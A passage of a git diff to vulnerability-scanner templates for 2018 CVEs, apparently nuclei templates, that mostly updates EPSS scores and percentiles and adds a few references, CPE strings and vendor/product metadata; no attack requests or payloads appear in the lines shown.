cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index f6e9e76821..f44fae5c1f 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.00151 - epss-percentile: 0.50613 + epss-percentile: 0.50991 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 7eea3583a6..82960eebac 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-11759 cwe-id: CWE-22 - epss-score: 0.97443 - epss-percentile: 0.99916 + epss-score: 0.97447 + epss-percentile: 0.99935 cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 902cee9120..0f53eb02e4 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-11776 cwe-id: CWE-20 epss-score: 0.97557 - epss-percentile: 0.99995 + epss-percentile: 0.99996 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 66e4fd3979..9b2ecf6504 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 - epss-score: 0.96524 - epss-percentile: 0.99413 + epss-score: 0.96612 + epss-percentile: 0.99488 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 5ad0f2efe6..30b601661a 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.01411 - epss-percentile: 0.84811 + epss-percentile: 0.84975 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index d27be094e2..9e8c400bb3 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12054 cwe-id: CWE-22 epss-score: 0.43824 - epss-percentile: 0.96879 + epss-percentile: 0.96946 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index e7a0400c5f..9059940940 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1207 cwe-id: CWE-94 - epss-score: 0.01778 - epss-percentile: 0.86487 + epss-score: 0.01875 + epss-percentile: 0.8707 cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 4351fa57e1..7938db4de2 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12095 cwe-id: CWE-79 epss-score: 0.00407 - epss-percentile: 0.70495 + epss-percentile: 0.7081 cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 89a2a6a0e5..80f220afb1 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 - epss-score: 0.01503 - epss-percentile: 0.85298 + epss-score: 0.01545 + epss-percentile: 0.85661 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 0b072cd49a..9c7eb6f1d7 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-12300 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45103 + epss-percentile: 0.45486 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 9977d721cf..3355787ee4 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - epss-score: 0.97383 - epss-percentile: 0.99864 + epss-score: 0.97419 + epss-percentile: 0.99906 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 9a7407fd1c..8825764151 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12634 cwe-id: CWE-200 epss-score: 0.95864 - epss-percentile: 0.99211 + epss-percentile: 0.9925 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 63f0ae2ffc..024d32a843 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45103 + epss-percentile: 0.45486 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index aeb370861b..d2693fd6d5 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - epss-score: 0.00803 - epss-percentile: 0.79507 + epss-score: 0.01096 + epss-percentile: 0.8278 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 9b03d71764..cf589331ac 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -22,9 +22,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1273 - cwe-id: CWE-94,CWE-20 + cwe-id: CWE-20,CWE-94 epss-score: 0.97498 - epss-percentile: 0.9996 + epss-percentile: 0.99971 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 1df5e56b81..373ae4dd2d 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12909 cwe-id: CWE-22 epss-score: 0.01119 - epss-percentile: 0.82786 + epss-percentile: 0.82969 cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 447f26b5d3..4754ea384a 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12998 cwe-id: CWE-79 epss-score: 0.97052 - epss-percentile: 0.99648 + epss-percentile: 0.9967 cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 6ad8f9c683..fdd7f8d3cf 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - epss-score: 0.97218 - epss-percentile: 0.99743 + epss-score: 0.9738 + epss-percentile: 0.99879 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 85a76a35fd..f17d393ece 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 - epss-score: 0.97486 - epss-percentile: 0.99951 + epss-score: 0.97418 + epss-percentile: 0.99905 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index e4cdcbddbb..b2e0085ad4 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.45743 + epss-percentile: 0.46119 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index b6835c8640..0bdf09f909 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.5447 + epss-percentile: 0.54904 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 210ceed65d..8ae4ffe6b1 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14013 cwe-id: CWE-79 epss-score: 0.00512 - epss-percentile: 0.73663 + epss-percentile: 0.73939 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 2acb596261..a4bc189206 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 - epss-score: 0.28372 - epss-percentile: 0.96243 + epss-score: 0.24472 + epss-percentile: 0.96067 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 63e99199dd..04d67722fa 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14474 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28011 + epss-percentile: 0.28345 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 704253a006..35b96dc105 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-14574 cwe-id: CWE-601 epss-score: 0.01218 - epss-percentile: 0.83586 + epss-percentile: 0.83762 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 18e6612bb3..2083c84251 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 - epss-score: 0.96926 - epss-percentile: 0.99601 + epss-score: 0.96833 + epss-percentile: 0.99569 cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 4f0d006d13..4470bc91ac 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.97246 - epss-percentile: 0.99761 + epss-score: 0.9702 + epss-percentile: 0.99656 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index e759bdd5eb..75bceec166 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14916 cwe-id: CWE-732 epss-score: 0.00483 - epss-percentile: 0.72875 + epss-percentile: 0.73176 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 9d564a9950..197acbed70 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14918 cwe-id: CWE-22 epss-score: 0.4378 - epss-percentile: 0.96878 + epss-percentile: 0.96944 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index ef5ed3aff6..0a3b00a8ad 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45103 + epss-percentile: 0.45486 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index cda46e7922..4d99ee187c 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 - epss-score: 0.34955 - epss-percentile: 0.96565 + epss-score: 0.28185 + epss-percentile: 0.96282 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 6adc88d65d..6ad1faee49 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01414 - epss-percentile: 0.84824 + epss-percentile: 0.84985 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 8092a8a652..8c0919b6bc 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15535 cwe-id: CWE-22 epss-score: 0.97149 - epss-percentile: 0.99695 + epss-percentile: 0.99724 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index b738c9d90d..ba377bdf0b 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - epss-score: 0.9654 - epss-percentile: 0.99425 + epss-score: 0.95179 + epss-percentile: 0.9909 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 92e6aeeef7..7a4bca289c 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -11,14 +11,20 @@ info: reference: - https://www.exploit-db.com/exploits/45338 - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 + - https://github.com/bbalet/jorani/issues/254 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2018-15917 cwe-id: CWE-79 + epss-score: 0.05086 + epss-percentile: 0.92035 + cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: jorani_project + product: jorani shodan-query: title:"Login - Jorani" tags: cve,cve2018,jorani,xss diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index b82515d5bc..8bc4a8112b 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 - epss-score: 0.97453 - epss-percentile: 0.99925 + epss-score: 0.97447 + epss-percentile: 0.99934 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index c6f6b581f8..d51a041e18 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - epss-score: 0.60231 - epss-percentile: 0.97328 + epss-score: 0.30244 + epss-percentile: 0.96389 cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index ed4212df54..9ff12fee5a 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - epss-score: 0.11636 - epss-percentile: 0.94538 + epss-score: 0.05113 + epss-percentile: 0.92051 cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 1dafd59203..687abf698a 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47998 + epss-percentile: 0.48363 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 0d300d243b..74aef92f5b 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16159 cwe-id: CWE-89 epss-score: 0.01247 - epss-percentile: 0.83832 + epss-percentile: 0.8399 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index ec49c9528f..dd0e598d51 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 - epss-score: 0.13203 - epss-percentile: 0.94828 + epss-score: 0.14211 + epss-percentile: 0.9507 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index ac971d06a4..7a6b09b107 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - epss-score: 0.2134 - epss-percentile: 0.95789 + epss-score: 0.13491 + epss-percentile: 0.94951 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 536beb3d25..f800506cd8 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 - epss-score: 0.2541 - epss-percentile: 0.96066 + epss-score: 0.24588 + epss-percentile: 0.96077 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 23ed6e3846..9a59c90cab 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-16299 cwe-id: CWE-22 - epss-score: 0.08709 - epss-percentile: 0.93696 + epss-score: 0.05083 + epss-percentile: 0.92032 cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index d198453e33..b15e1a2067 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16668 cwe-id: CWE-287 - epss-score: 0.00352 - epss-percentile: 0.68356 + epss-score: 0.00248 + epss-percentile: 0.62367 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 620f76c662..dc231ebcd7 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16670 cwe-id: CWE-287 - epss-score: 0.00187 - epss-percentile: 0.55422 + epss-score: 0.00132 + epss-percentile: 0.47754 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 5c9a696164..092e7ca418 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16671 cwe-id: CWE-200 - epss-score: 0.00357 - epss-percentile: 0.68577 + epss-score: 0.00251 + epss-percentile: 0.62709 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index c8e93a6aa6..d9869a630d 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - epss-score: 0.00803 - epss-percentile: 0.7951 + epss-score: 0.00716 + epss-percentile: 0.78317 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 4cb92526c4..60d991b8a1 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16761 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28011 + epss-percentile: 0.28345 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index d275a79199..3a816343f8 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 - epss-score: 0.79948 - epss-percentile: 0.97878 + epss-score: 0.83439 + epss-percentile: 0.98048 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index d0c62d77eb..9369159ce6 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.34263 - epss-percentile: 0.96533 + epss-percentile: 0.96585 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index e1101ed28a..4a623c7362 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16979 cwe-id: CWE-113 epss-score: 0.00118 - epss-percentile: 0.45103 + epss-percentile: 0.45486 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 59ca6b8d56..b9c0c0f802 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -13,12 +13,14 @@ info: - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 + - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17153 cwe-id: CWE-287 - epss-score: 0.01264 + epss-score: 0.91507 + epss-percentile: 0.98559 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ 